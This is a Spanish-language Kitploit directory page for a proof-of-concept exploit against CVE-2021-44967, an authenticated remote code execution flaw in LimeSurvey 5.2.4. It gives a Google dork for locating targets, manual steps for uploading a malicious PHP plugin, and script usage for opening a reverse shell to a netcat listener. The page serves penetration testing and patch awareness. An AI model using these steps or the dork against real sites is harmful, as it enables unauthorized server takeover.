Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-44967 — Exploit PoC para CVE-2021-44967 | Kitploit
Herramientas/GitHubGitHub/d3ext/cve-2021-44967
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubd3ext/cve-2021-44967

CVE-2021-44967

Exploit PoC para CVE-2021-44967

Ver Repositorio
6hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-44967

root@kitploit:~
# Exploit Title: LimeSurvey 5.2.4 - Authenticated Remote Code Execution (RCE)
# Google Dork: inurl:limesurvey/index.php/admin/authentication/sa/login
# Date: 05/12/2021
# Discovered by: Y1LD1R1M
# Exploit Author: D3Ext
# Vendor Homepage: https://www.limesurvey.org/
# Software Link: https://download.limesurvey.org/latest-stable-release/limesurvey5.2.4+211129.zip
# Version: 5.2.x
# Tested on: Kali Linux 2025
# CVE: CVE-2021-44967

Explicación

Existe una vulnerabilidad de Ejecución Remota de Código (RCE) en LimeSurvey 5.2.4 a través de la función de carga e instalación de plugins, que podría permitir a un usuario malicioso remoto cargar un archivo de código PHP arbitrario.

Estos son los pasos a seguir para explotar esta vulnerabilidad manualmente:

  1. Crear un ZIP que contenga el archivo PHP y el archivo de configuración
  2. Iniciar sesión en LimeSurvey
  3. Ir a Configuración -> Plugins -> Cargar e Instalar
  4. Cargar tu archivo ZIP
  5. Instalarlo
  6. Finalmente, activar tu plugin
  7. Entonces tu código PHP debería ser accesible bajo /upload/plugins/<nombre_plugin>/<archivo_php>

Uso

root@kitploit:~
usage: CVE-2021-44967.py [-h] --url URL --user USER --password PASSWORD --lhost LHOST --lport LPORT [--verbose]

CVE-2021-44967 - LimeSurvey Authenticated RCE

options:
  -h, --help           show this help message and exit
  --url URL            URL of the LimeSurvey web root
  --user USER          username to log in
  --password PASSWORD  password of the username
  --lhost LHOST        local host to receive the reverse shell
  --lport LPORT        local port to receive the reverse shell
  --verbose            enable verbose

Inicia un listener de netcat y luego ejecuta el exploit de esta manera:

root@kitploit:~
python3 --url <URL> --user <username> --password <password> --lhost <local host> --lport <local port>

Demostración

Referencias

root@kitploit:~
https://github.com/Y1LD1R1M-1337/Limesurvey-RCE
https://www.exploit-db.com/exploits/50573
https://github.com/p0dalirius/LimeSurvey-webshell-plugin
https://ine.com/blog/cve-2021-44967-limesurvey-rce
https://pentest-tools.com/vulnerabilities-exploits/limesurvey-524-rce-vulnerability_13029

Licencia

Este proyecto está bajo la licencia MIT

Copyright © 2025, D3Ext

Descargar herramienta